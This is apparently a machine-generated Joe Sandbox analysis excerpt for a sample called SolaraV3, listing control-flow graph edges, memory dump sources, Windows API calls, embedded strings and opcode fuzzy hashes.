7ff6dc71bda7-7ff6dc71bdaf 1367->1372 1373 7ff6dc71bd82-7ff6dc71bd9b call 7ff6dc71b674 1367->1373 1376 7ff6dc71be2b-7ff6dc71be38 call 7ff6dc71b4b4 1372->1376 1377 7ff6dc71bdb1-7ff6dc71bdc3 1372->1377 1380 7ff6dc71bda0-7ff6dc71bda2 1373->1380 1376->1380 1381 7ff6dc71be1e-7ff6dc71be26 1377->1381 1382 7ff6dc71bdc5 1377->1382 1380->1353 1381->1353 1384 7ff6dc71bdca-7ff6dc71bdd1 1382->1384 1385 7ff6dc71be0d-7ff6dc71be18 1384->1385 1386 7ff6dc71bdd3-7ff6dc71bdd7 1384->1386 1385->1381 1387 7ff6dc71bdd9-7ff6dc71bde0 1386->1387 1388 7ff6dc71bdf3 1386->1388 1387->1388 1390 7ff6dc71bde2-7ff6dc71bde6 1387->1390 1389 7ff6dc71bdf9-7ff6dc71be09 1388->1389 1389->1384 1392 7ff6dc71be0b 1389->1392 1390->1388 1391 7ff6dc71bde8-7ff6dc71bdf1 1390->1391 1391->1389 1392->1381
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                              • Instruction ID: 99c03d8e260e3d2b49d0a7d6baf5f44e17883e53a85fc31120d4f2919f769fe9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DC138A2A1C78F81E7618B1D90612BD3B54FB81B90F556133EA4E83795CF7CE46B8740

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                              • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                              • Instruction ID: 3059dc2f01a71683287ed9c1200bdf705e85bf689016b3d0645b35dcdfb4a902
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D418121B18A8F91EA21DB26E4252ED6325FF54340F800133EA5D876D5EF3DE62BD740

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                              • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                              • Instruction ID: f2fcf0d37a12b62c590ca901a2d41bc21c043bd6961b1e52981bf9003430a903
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C341A422E1878683E7548B24D56437D7360FB947A4F10A336E69C43AD5DF7CA5F28740

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                              • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                              • Instruction ID: 99d89fcde20f4cca788a140a4b8d814005db7b87fff77668cbe51f2059ecb85b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15313C21E0C24F45FE24AB66D4623BD56A1AF51384F445037E90EC72D7DE2EB927E342
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\statem.c
                                                                                                                                                                                                                              • API String ID: 1452528299-2512360314
                                                                                                                                                                                                                              • Opcode ID: a3e023d0b073baeba4bd492517419a31f62972f068ae63838dd34882c46fe785
                                                                                                                                                                                                                              • Instruction ID: d0bd4473543d305c3d8def4e22e27bd34c938e38e0e3c4000a87360a4678f6bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3e023d0b073baeba4bd492517419a31f62972f068ae63838dd34882c46fe785
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7FB18FF2A2A24286F7A49F35C44AFBD36F0EF41B48F144435EA0946699DF3DE884CB01
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID: ..\s\ssl\record\rec_layer_s3.c
                                                                                                                                                                                                                              • API String ID: 1452528299-2209325370
                                                                                                                                                                                                                              • Opcode ID: 3dcb4004876841d817ef47d2efc369b4e2620c560bc807afff1c78d3bfb42160
                                                                                                                                                                                                                              • Instruction ID: a1fc623796c9d5a9cb0ca6983fa0be750660ffa9f49487fccbe74a921d5eb276
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dcb4004876841d817ef47d2efc369b4e2620c560bc807afff1c78d3bfb42160
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99816DF2A19A8681EB509F35D648FAD67A0FF44B98F184135DE4D0BB98DF38D946C340
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction ID: 8909cbd613fb996e1adbe582df758805a12db95160e7ff03f5ba0144f44b099d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07512921B0928986F7649A2D942467E6691BF44BF4F18A737DD7D837C9CE3CE4239600
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID: ..\s\ssl\record\rec_layer_s3.c
                                                                                                                                                                                                                              • API String ID: 1452528299-2209325370
                                                                                                                                                                                                                              • Opcode ID: 8d41160d5e821a9b59c27cfcbeb813b5333318ab4bb8ac73822785134f644a65
                                                                                                                                                                                                                              • Instruction ID: 3e58fb7bfc8e7603d01b464235031eb325368566e2cdf8baeae1721758137c49
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d41160d5e821a9b59c27cfcbeb813b5333318ab4bb8ac73822785134f644a65
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2416FF2A19A8182EB209F29D548EAD73A5FF44B88F544635DB4C07B94DF7DE8918700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                              • Instruction ID: d8f8231e8349ab292ba8546ab0b2e6506ccfc607cb20df7be546b439c22b0af1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0311C471B18A8581DA208B69A82416DB361FB45FF4F545332EE7D877D9CE7CD0228700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A95E
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A968
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                              • Instruction ID: 0094c6eaa3d4d63496d20ff8e69808eeffa1c6b15ae0b44f8721ca82363fe342
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DE08C50F0920E43FF296BF6A86513C5651AF88B00F455036C80EC22A2EE2CA8A78710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00007FF6DC71A9D5,?,?,00000000,00007FF6DC71AA8A), ref: 00007FF6DC71ABC6
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6DC71A9D5,?,?,00000000,00007FF6DC71AA8A), ref: 00007FF6DC71ABD0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                              • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                              • Instruction ID: 0c11eec4320f1b1e243678bd6dbc2af7e9d367a760fc7e2fddad315d07596af5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0821D811F1C68A41FAB157A994B037D12929F84BB0F18633BD92EC77D1CE6CE5634300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                              • Instruction ID: c65993b15f576a6d6c905b041e5978778d586cff82d162d69b6a1a4842970028
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9441E37291824987EA349B2DA56027D73A5EB59B90F142132EB9EC36D1CF3CE423CB50
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                              • Opcode ID: 8461a2502f026d7e122df3db3e91d2553ea804ff5e6dd715b8e622b6a9c6ea1c
                                                                                                                                                                                                                              • Instruction ID: 945ac33e8e9cad7e5493aa6e4d079119bdff1eaa15741d7b6c9c8a8b9e904895
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8461a2502f026d7e122df3db3e91d2553ea804ff5e6dd715b8e622b6a9c6ea1c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4731B2F2A2A24286F7A49E35D54AE7D73B1EF40F84F544431EE0943699DF38E8828B00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 840049012-0
